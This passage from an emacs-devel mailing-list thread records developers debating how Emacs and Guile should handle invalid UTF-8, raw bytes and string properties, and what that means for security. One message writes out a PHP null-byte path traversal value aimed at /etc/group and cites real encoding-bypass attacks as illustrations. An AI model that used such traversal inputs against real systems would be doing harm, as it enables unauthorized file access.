and perhaps also replacing them with the equivalent of u+FFFD, the
Unicode "replacement character".

> Meanwhile, in a separate message I wrote about non-file operations:

Well, you said "frile", which confused me ;-)  However, ...

>     > We can set the defaults for those non-frile interfaces so as to reject
>     > invalid UTF-8 sequences.  Then a program could specify to override the
>     > default and allow them.
> 
>     That has been tried (not with UTF-8, but I don't think this matters),
>     and failed miserably.
> 
> I don't think we are talking about the same thing.  I am talking about Lisp
> functions to do conversions on text that does NOT come from files.

... Emacs treats all of these cases the same.  For text we are going
to send to a process or network stream, we ask the above-mentioned
question at the time we encode the internal representation into the
external byte stream we are about to send.  E.g., you can see that in
action in sending mail if you insert some raw bytes into a mail
message in a *mail* buffer, and then try sending it.  There's no file
involved here, at least not as far as Emacs is concerned, and yet you
will see the same prompt asking you to select a proper encoding.

> You seem to be talking about operations on files:
> 
> 			   The experience taught us that Emacs users
>     definitely don't want Emacs to do _anything_ about the unmodified
>     parts of text, except copy it verbatim.  Even the question we ask at
>     buffer-save time is sometimes reported as an annoyance.
> 
> It looks like you're grouping the two cases together,
> while I am treating them separately.

Emacs treats them both the same way, and uses the same low-level
primitives that generally don't know the purpose of the byte stream
they are encoding or decoding.  All they know is whether the source
resp. destination is a buffer, a string, or a gap in the buffer text,
which is insufficient to distinguish between the 2 use cases you are
trying to treat separately.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  4:14                                                                         ` David Kastrup
@ 2014-10-09  7:31                                                                           ` Stephen J. Turnbull
  2014-10-09  8:05                                                                             ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09  7:31 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	monnier, Andreas Schwab, Eli Zaretskii

David Kastrup writes:

 > > who may lose their life savings if a filter for 419 phish fails
 > 
 > Can we have terrorism with that scaremongering?

Are you really unaware that such exploits happen every day?  You're
not the only programmer who deprecates security because *your*
applications are "secure enough" and it "can't" happen to you, you
know.[1]  That's *why* those exploits are possible -- because some of
those good honest folks were *dead wrong*, and all too often we don't
know which ones were wrong until somebody gets scammed.

 > If you keep confusing the responsibilities of platform, application
 > and user, you arrive at a system you have to work around with
 > constantly because it knows better than you what you want.

Unfortunately, I'm not the one who lacks understanding.  I'm well
aware that security is costly in convenience and functionality.
Nevertheless, I am willing to suffer those losses (which will be far
less than your exaggerated fears), and advocate imposing them on you
as well, because I'm aware of the consequences of doing otherwise.


Footnotes: 
[1]  Heck, that's what the devils at the top of Tokyo Electric Power
Co said as their Fukushima reactor blew its own roof off, and they
*continue* to say that such accidents are "unimaginable".



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  0:47                                                   ` Richard Stallman
  2014-10-08  7:13                                                     ` Eli Zaretskii
@ 2014-10-09  7:36                                                     ` David Kastrup
  2014-10-10 14:25                                                       ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-09  7:36 UTC (permalink / raw)
  To: Richard Stallman
  Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
>     UTF-8 is defined as not containing "overlong" sequences, so Emacs
>     decodes them into two raw-byte indicating characters, one indicating
>     0xC0, one indicating 0xA2.  When encoding, it reassembles them into
>     0xC0 0xA2.
>
> In that case, it might be reasonable to ask the user whether to accept
> a UTF-8 file decoding that contains any raw-byte characters.
>
> What do people think of this?
>
>     One problem with that is that quite often Emacs' choice of a coding
>     system for a buffer is the result of heuristics rather than dependable
>     information.  Not making a fuzz might often be simplest.
>
> Could you explain what "fuzz" means here?

You load a file, edit a line, try saving.  Emacs complains that it feels
insecure doing so even though the line you edited is perfectly fine.
That's getting in the way of doing work.  It would be worse if Emacs
already prompted for approval when loading.

More often than not, the locale applied for operations is not even
explicitly specified but a consequence of the user environment or
preexisting content.  Having internal operations and file read/write
fail depending on the state of the user environment is a nuisance.
That's particularly a danger when most core developers actually use
basic English locales and don't even notice the havoc "locale-awareness"
may cause.

A recurring phenomenon in that direction is generation of number
presentations that can no longer be processed because of being written
under the influence of an LC_NUMERIC setting developers did not expect.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  7:16                                                   ` Stephen J. Turnbull
@ 2014-10-09  7:47                                                     ` Eli Zaretskii
  2014-10-09 10:20                                                       ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-09  7:47 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Date: Thu, 09 Oct 2014 16:16:04 +0900
> Cc: rms@gnu.org, mhw@netris.org, dmantipov@yandex.ru, emacs-devel@gnu.org,
> 	handa@gnu.org, monnier@iro.umontreal.ca, eliz@gnu.org
> 
> Until you demonstrate at least a shred of understanding of something
> as fundamental as the differences in security requirements and
> attack surfaces of network *servers* and network *clients*, there's
> no point in discussing your statements further.

This kind of "argument" will get you no points here, cf Ian Grant.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  7:21                                                         ` Eli Zaretskii
@ 2014-10-09  7:52                                                           ` David Kastrup
  2014-10-09  8:41                                                             ` Eli Zaretskii
  2014-10-10 14:24                                                           ` Richard Stallman
  2014-10-10 14:24                                                           ` Richard Stallman
  2 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-09  7:52 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> I don't think we are talking about the same thing.  I am talking
>> about Lisp functions to do conversions on text that does NOT come
>> from files.
>
> ... Emacs treats all of these cases the same.

Well, on a fine-grained level.  We have something like


Coding system for saving this buffer:
  U -- utf-8-emacs-unix (alias: emacs-internal)

Default coding system (for new files):
  U -- utf-8-unix (alias: mule-utf-8-unix)

Coding system for keyboard input:
  U -- utf-8-unix (alias: mule-utf-8-unix)

Coding system for terminal output:
  U -- utf-8-unix (alias: mule-utf-8-unix)

Coding system for inter-client cut and paste:
  nil
Defaults for subprocess I/O:
  decoding: U -- utf-8-unix (alias: mule-utf-8-unix)

  encoding: U -- utf-8-unix (alias: mule-utf-8-unix)


Priority order for recognizing coding systems when reading files:
  1. utf-8 (alias: mule-utf-8)
  2. iso-2022-7bit 
  3. iso-latin-1 (alias: iso-8859-1 latin-1)
  4. iso-2022-7bit-lock (alias: iso-2022-int-1)
  5. iso-2022-8bit-ss2 
  6. emacs-mule 

[...]

  20. undecided 

  Other coding systems cannot be distinguished automatically
  from these, and therefore cannot be recognized automatically
  with the present coding system priorities.

Particular coding systems specified for certain file names:

  OPERATION	TARGET PATTERN		CODING SYSTEM(s)
  ---------	--------------		----------------
  File I/O	"\\.dz\\'"		(no-conversion . no-conversion)
		"\\.txz\\'"		(no-conversion . no-conversion)
[...]
  Process I/O	nothing specified
  Network I/O	nothing specified

> For text we are going to send to a process or network stream, we ask
> the above-mentioned question at the time we encode the internal
> representation into the external byte stream we are about to send.

It depends on how you specify the coding system.  When setting the
principally responsible variable for an operation, you get no questions
asked.  When setting some user-level specifiable preference, Emacs will
prompt for alternatives when accepting that preference unasked would
likely have user-level consequences that might or might not be
acceptable.

> E.g., you can see that in action in sending mail if you insert some
> raw bytes into a mail message in a *mail* buffer, and then try sending
> it.  There's no file involved here, at least not as far as Emacs is
> concerned, and yet you will see the same prompt asking you to select a
> proper encoding.

Well, in the case of mail that makes sense since otherwise the content
will not likely survive the designated channel.  It is perfectly
reasonable in my book to not silently go through with operations leading
to a an expected loss of information.

I still don't want the autosave of mail to complain about bad
characters.  It's important that an application can pick where to apply
its checks and balances itself.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  4:49                                                 ` Mike Gerwitz
@ 2014-10-09  8:00                                                   ` Eli Zaretskii
  2014-10-09 10:50                                                     ` Stephen J. Turnbull
  2014-10-10 14:23                                                   ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-09  8:00 UTC (permalink / raw)
  To: Mike Gerwitz
  Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Thu, 9 Oct 2014 00:49:17 -0400
> From: Mike Gerwitz <mikegerwitz@gnu.org>
> Cc: rms@gnu.org, dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	eliz@gnu.org
> 
> On Thu, Oct 09, 2014 at 12:56:42PM +0900, Stephen J. Turnbull wrote:
> > Richard Stallman writes:
> > 
> >  > If you demonstrate that this claim is valid, I will be concerned.
> > 
> > *sigh*  Be unconcerned.  The world is a *lot* more hostile today than
> > it was in the days when you posted your passwords on the 'net.
> 
> Agreed. Character encoding attacks are also something that has been
> exploited "in the wild". Some examples include:
> 
>   - UTF-7 character encoding to bypass filters[0] (e.g. for XSS);
>   - IIS WebDAV validation exploit (CVE-2009-1535);[1] and
>   - CAPEC-80: Using UTF-8 Encoding to Bypass Validation Logic;[2] and
>   - Google's XSS vulnerability, related to the first item in this list.[3]
> 
> Note that not all of the above may be applicable to the specifics of this
> discussion---the point is to convey, generally, that character encoding
> poses serious threats when improperly handled. Though this discussion seems
> to be about what is "improper".

Aren't you again confusing the application level with the lower
"engine" level?  Applications, which do interpret the text, should
indeed be aware of these issues.  (For the purposes of this
discussion, "application" means Lisp code that processes text, or
presents it to the user, or acts according to user responses.)  But
the "engine" must be able to handle raw bytes, including invalid UTF-8
sequences, unless told otherwise.  Any other default will unduly
punish the innocent majority on behalf of the evil minority.

> With regards to passing raw input to other systems: this isn't necessarily
> Unicode related (unless an invalid sequence contains a null byte), but
> serves to illustrate the point that Mark is trying to make: there is a
> well-known issue in PHP whereby passing a null byte as a parameter to a
> script (e.g. via HTTP GET/POST) opens up a number of attacks.  Specifically,
> PHP handles null bytes in strings (by storing the string length as part of
> the struct that holds the string). However, it makes calls directly to libc.
> So, if an unvalidated input $foo contains "../../../../etc/group\000", and
> PHP makes a call to `fopen' with the path "/webroot/modules/$foo/index.php",
> the result would be opening "/webroot/modules/../../../../etc/group".

So what would you have Emacs do when I'm editing a file with binary
nulls: ask me for each save whether I really mean it, and lecture me
about possible security implications?  The encoding routines have no
idea whether they are encoding a PHP script, much less whether it will
be sent via HTTP.

> I can dig up more examples, but hopefully some of these help to illustrate
> the severity of ignoring character encoding concerns.

Please do, but (a) please make the examples be relevant to what Emacs
does with decoding and encoding external bytestreams, and (b) please
suggest what you think Emacs should do in those cases instead of what
it does now.  Otherwise, this discussion is much less constructive
than it could be, because our concerns are with how the discussed
issues will or should affect Emacs.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  7:31                                                                           ` Stephen J. Turnbull
@ 2014-10-09  8:05                                                                             ` David Kastrup
  0 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-09  8:05 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	monnier, Andreas Schwab, Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> David Kastrup writes:
>
>  > > who may lose their life savings if a filter for 419 phish fails
>  > 
>  > Can we have terrorism with that scaremongering?
>
> Are you really unaware that such exploits happen every day?

So does terrorism.  But the existence of threats is no excuse for
handwaving justifications of measures that do nothing to address the
threats.

> You're not the only programmer who deprecates security because *your*
> applications are "secure enough" and it "can't" happen to you, you
> know.

At the current point of time, we are more talking about deprecating
security theatre rather than security.  Primitive operations that fail
rather than process and pass on information are attack vectors for
denial-of-service attacks.

> Unfortunately, I'm not the one who lacks understanding.  I'm well
> aware that security is costly in convenience and functionality.

How about you explain in what respect XEmacs' non-round-trippability of
utf-8 encoding helps with the security of running AUCTeX?

How about explaining in what respect it helps with security in _any_
regard that XEmacs is not able to faithfully reproduce its input?  How
are you even supposed to _scan_ for malicious input if you refuse to
decode it in recognizable manner?

Again: the responsibilities of an engine and of an application are
different.  And not understanding that and thinking that the former can
somehow absolve the latter from doing its job if it is annoying
enough...  Security theatre.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  7:52                                                           ` David Kastrup
@ 2014-10-09  8:41                                                             ` Eli Zaretskii
  2014-10-09  9:22                                                               ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-09  8:41 UTC (permalink / raw)
  To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> From: David Kastrup <dak@gnu.org>
> Cc: rms@gnu.org,  mhw@netris.org,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  monnier@iro.umontreal.ca,  stephen@xemacs.org
> Date: Thu, 09 Oct 2014 09:52:31 +0200
> 
> I still don't want the autosave of mail to complain about bad
> characters.

We write the auto-save files in the internal format, so it never
complains.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  8:41                                                             ` Eli Zaretskii
@ 2014-10-09  9:22                                                               ` David Kastrup
  2014-10-13  3:04                                                                 ` Mark H Weaver
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-09  9:22 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> From: David Kastrup <dak@gnu.org>
>> Cc: rms@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
>> emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
>> stephen@xemacs.org
>> Date: Thu, 09 Oct 2014 09:52:31 +0200
>> 
>> I still don't want the autosave of mail to complain about bad
>> characters.
>
> We write the auto-save files in the internal format, so it never
> complains.

If you are not allowed or able to do that...  At the current point of
time, the only round-trippable encoding for bytes that GUILE offers is
latin-1, and the only round-trippable encoding for characters is utf-8.

The conceptual lack of separation between internal and external utf-8
encoding leads to strangenesses like

scheme@(guile-user)> (with-input-from-string "\ufeff!" read-char)
$8 = #\!

Yes, this is a string->string operation losing a byte order mark in
spite of no indication that I would like to get encodings involved in
any manner.

Now we'll probably get "oh, that's a bug, we'll fix it".  But the point
is that being sloppy with the distinction between internal and external
character sets and encodings and "valid" and "invalid" will buy you
unmatched encoding/decoding passes inviting such problems.

And when I can say "let's see where this kind of thinking will lead" and
find a hole to poke within a minute, so will malicious people.  And that
is a real security concern.

Also: if I do not even manage to save a string into a string in "the
internal format" unchanged, good luck with your auto-save file.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  7:47                                                     ` Eli Zaretskii
@ 2014-10-09 10:20                                                       ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09 10:20 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier

Eli Zaretskii writes:

 > This kind of "argument" will get you no points here, cf Ian Grant.

It's not an argument, it's an explanation of why I'm leaving the
conversation.





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  8:00                                                   ` Eli Zaretskii
@ 2014-10-09 10:50                                                     ` Stephen J. Turnbull
  2014-10-09 11:06                                                       ` David Kastrup
  2014-10-09 11:27                                                       ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-09 10:50 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, rms, handa, mhw, dmantipov, emacs-devel, Mike Gerwitz,
	monnier

Eli Zaretskii writes:

 > Aren't you again confusing the application level with the lower
 > "engine" level?

No, you and David are confused.  All experience with programming
systems shows that if you leave security up to the application
programmers, you won't get enough.  Remember, the security of a system
is equal to the minimum of the security levels of its components.

Of course the engine level needs to provide the *option* to be
flexible.  But that flexibility must be opt-in for the applications
that need to be nonconformant, not opt-out for the applications that
are happy to conform.  The latter won't bother ("it's too much to
type").

In the case of Emacs coding systems, it's as simple as choosing to
name the conformant coding system 'utf-8, and the non-conformant one
'utf-8-with-rawbytes.  Why does this excite such <adjective deleted>
opposition?





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09 10:50                                                     ` Stephen J. Turnbull
@ 2014-10-09 11:06                                                       ` David Kastrup
  2014-10-09 17:23                                                         ` Richard Stallman
  2014-10-09 11:27                                                       ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-09 11:06 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, handa, mhw, dmantipov, emacs-devel, Mike Gerwitz, monnier,
	Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Eli Zaretskii writes:
>
>  > Aren't you again confusing the application level with the lower
>  > "engine" level?
>
> No, you and David are confused.  All experience with programming
> systems shows that if you leave security up to the application
> programmers, you won't get enough.  Remember, the security of a system
> is equal to the minimum of the security levels of its components.

Annoying and distracting the application programmer is not providing
additional security.  It's security theatre.

> In the case of Emacs coding systems, it's as simple as choosing to
> name the conformant coding system 'utf-8, and the non-conformant one
> 'utf-8-with-rawbytes.  Why does this excite such <adjective deleted>
> opposition?

So first I let the locale and other mechanisms choose an encoding, then
try getting at its choice of coding system before any prompts appear,
then I convert the symbol to a string, check whether the string ends
with "-with-rawbytes" and append it if needed (let's hope it is in the
right location with regard to "-dos" or "-unix" endings) and
lo-and-behold, I am allowed to read a file.  Or network connection.  Or
console output.  If I don't get that, either my control flow will be
affected, or I will receive falsified data not corresponding to the
input that I can't even check for bad bytes and for which I am unable to
figure out byte offsets of various parts in the input because I can no
longer reconstruct the input faithfully.

"Stuff refuses to work" will lose you more users than "stuff refuses to
secondguess".

Stuff like PostScript files are text files with occasional binary
sections.  That's real-world data and dealing with it should not require
preannouncing it every time explicitly.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09 10:50                                                     ` Stephen J. Turnbull
  2014-10-09 11:06                                                       ` David Kastrup
@ 2014-10-09 11:27                                                       ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-09 11:27 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, rms, handa, mhw, dmantipov, emacs-devel, mikegerwitz,
	monnier

> From: "Stephen J. Turnbull" <stephen@xemacs.org>
> Cc: Mike Gerwitz <mikegerwitz@gnu.org>,
>     dak@gnu.org,
>     rms@gnu.org,
>     mhw@netris.org,
>     dmantipov@yandex.ru,
>     emacs-devel@gnu.org,
>     handa@gnu.org,
>     monnier@iro.umontreal.ca
> Date: Thu, 09 Oct 2014 19:50:37 +0900
> 
> In the case of Emacs coding systems, it's as simple as choosing to
> name the conformant coding system 'utf-8, and the non-conformant one
> 'utf-8-with-rawbytes.

We already tried something akin to that, and the users almost
unanimously wanted Emacs to opt-in by default.

> Why does this excite such <adjective deleted> opposition?

Because we've been-there-done-that, and have enough gray hair to prove
that what you are asking will be met with staunch user opposition.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09 11:06                                                       ` David Kastrup
@ 2014-10-09 17:23                                                         ` Richard Stallman
  2014-10-09 17:37                                                           ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-09 17:23 UTC (permalink / raw)
  To: David Kastrup
  Cc: mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen,
	eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    So first I let the locale and other mechanisms choose an encoding, then
    try getting at its choice of coding system before any prompts appear,
    then I convert the symbol to a string, check whether the string ends
    with "-with-rawbytes" and append it if needed

Is that really a likely scenario?

I expect that a program, doing some non-editing job involving a
network connection, ought to specify a fixed coding system in accord
with the protocol it is communicating with.

If there are programs that want to heuristically select coding systems
for purposes other than reading files, and want to allow raw bytes
when UTF-8 is selected, we can easily accommodate them by providing a
way to say, "If the heuristics say this is utf-8, use the coding
system utf-8-raw-bytes."

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09 17:23                                                         ` Richard Stallman
@ 2014-10-09 17:37                                                           ` Eli Zaretskii
  2014-10-12  3:24                                                             ` Richard Stallman
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-09 17:37 UTC (permalink / raw)
  To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

> Date: Thu, 09 Oct 2014 13:23:43 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: stephen@xemacs.org, handa@gnu.org, mhw@netris.org,
> 	dmantipov@yandex.ru, emacs-devel@gnu.org, mikegerwitz@gnu.org,
> 	monnier@iro.umontreal.ca, eliz@gnu.org
> 
>     So first I let the locale and other mechanisms choose an encoding, then
>     try getting at its choice of coding system before any prompts appear,
>     then I convert the symbol to a string, check whether the string ends
>     with "-with-rawbytes" and append it if needed
> 
> Is that really a likely scenario?

It is what happens with all our general-purpose commands and APIs that
invoke subprocesses, like shell-command, shell-command-on-region,
start-process, etc.  The default is to use the locale-specific
encoding, and users, of course, are not required to type any specific
coding systems when they invoke those commands/functions.

> I expect that a program, doing some non-editing job involving a
> network connection, ought to specify a fixed coding system in accord
> with the protocol it is communicating with.

The protocols rarely specify encoding, AFAIK.  If they do, we do use
them, e.g., when decoding an email message that specifies its MIME
charset.  But that comes _after_ we already have read the mail into a
buffer in its raw undecoded form.

And, of course, when you invoke a program locally, there's usually no
protocol at all involved.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 19:15                                         ` Richard Stallman
  2014-10-07  0:46                                           ` Stephen J. Turnbull
@ 2014-10-10 10:09                                           ` Thien-Thi Nguyen
  1 sibling, 0 replies; 261+ messages in thread
From: Thien-Thi Nguyen @ 2014-10-10 10:09 UTC (permalink / raw)
  To: emacs-devel

[-- Attachment #1: Type: text/plain, Size: 784 bytes --]

() Richard Stallman <rms@gnu.org>
() Mon, 06 Oct 2014 15:15:20 -0400

   Do people write spam/virus checkers using Guile?

   This issue is specifically about Guile.

Two examples that jump to mind:

GNU Mailutils (http://www.gnu.org/software/mailutils/),
specifically its "Sieve" handling (based on RFC 3028),
is extensible w/ Guile.

In ttn-do (http://www.gnuvola.org/software/ttn-do/),
the program "magic" is a file(1)-workalike, which basically
means it trundles through unknown byte sequences, sometimes
interpreting them as strings.

-- 
Thien-Thi Nguyen
   GPG key: 4C807502
   (if you're human and you know it)
      read my lisp: (responsep (questions 'technical)
                               (not (via 'mailing-list)))
                     => nil

[-- Attachment #2: signature.asc --]
[-- Type: application/pgp-signature, Size: 197 bytes --]

^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  3:06                                               ` Stephen J. Turnbull
  2014-10-09  3:44                                                 ` David Kastrup
@ 2014-10-10 14:23                                                 ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-10 14:23 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    It would be "nice" and "efficient" for Guile to implement properties
    natively so that Emacs could just use those, but Mark is correct to
    worry that those properties would be used to bypass validation modules
    written for pre-property Guile versions.

You keep claiming that is correct while presenting no evidence it is
correct.  Put up or shut up.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  3:56                                               ` Stephen J. Turnbull
  2014-10-09  4:49                                                 ` Mike Gerwitz
@ 2014-10-10 14:23                                                 ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-10 14:23 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

     > you need to show it is real security and really does a useful job.

    I suspect I can't give you a convincing example, because I haven't
    studied the Guile modules "at risk",

Someone else is welcome to convince me, too.

It seems to me that what your argument must be false.
You're saying that module A could pass data to module C
through properties in a string passed through module B.
Yes, it could.  But module A could put the same data in
a global variable and C could read it there.

So where is the "security"?

    Or how about the recent bash lossage?  s-expressions are just Lisp
    data, and could be placed in a property.

These two cases are different in their essential structure.  The Bash
case involves a browser that sends data thru Apache to trick Bash,
with both Apache and Bash being honest.  To do this, it has to fiddle
with data that Bash will look at for some legitimate purpose.

In this case, we have to suppose that A and C are BOTH malicious, and
the question is whether B can (as a security measure) prevent them
from communicating.

I challenge people to demonstrate that Guile provides some real
security against such communication, in the absence of text properties
in strings.

If you can't, then pipe down and leave this to someone else who can.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  4:49                                                 ` Mike Gerwitz
  2014-10-09  8:00                                                   ` Eli Zaretskii
@ 2014-10-10 14:23                                                   ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-10 14:23 UTC (permalink / raw)
  To: Mike Gerwitz
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > *sigh*  Be unconcerned.  The world is a *lot* more hostile today than
    > it was in the days when you posted your passwords on the 'net.

    Agreed. Character encoding attacks are also something that has been
    exploited "in the wild". Some examples include:

You're talking about character encoding, but the message you responded to
was about whether to put text properties in GUILE strings.
The two issues are unrelated.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  7:21                                                         ` Eli Zaretskii
  2014-10-09  7:52                                                           ` David Kastrup
@ 2014-10-10 14:24                                                           ` Richard Stallman
  2014-10-10 15:28                                                             ` Eli Zaretskii
  2014-10-10 14:24                                                           ` Richard Stallman
  2 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-10 14:24 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > I don't think we are talking about the same thing.  I am talking about Lisp
    > functions to do conversions on text that does NOT come from files.

    ... Emacs treats all of these cases the same.

They don't HAVE to be treated the same.  We are talking about changes,
here.

But changes may not be needed.  All operations that do encoding or
decoding allow explicit specification of the coding system.


-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09  7:21                                                         ` Eli Zaretskii
  2014-10-09  7:52                                                           ` David Kastrup
  2014-10-10 14:24                                                           ` Richard Stallman
@ 2014-10-10 14:24                                                           ` Richard Stallman
  2014-10-10 15:38                                                             ` Eli Zaretskii
       [not found]                                                             ` <<83r3yg9bpu.fsf@gnu.org>
  2 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-10 14:24 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > Asking about invalid UTF-8 in a file could be a nuisance, but how much
    > of a nuisance depends on the details of what we do.  Since this has
    > some security implications, it is worth a small amount of nuisance.

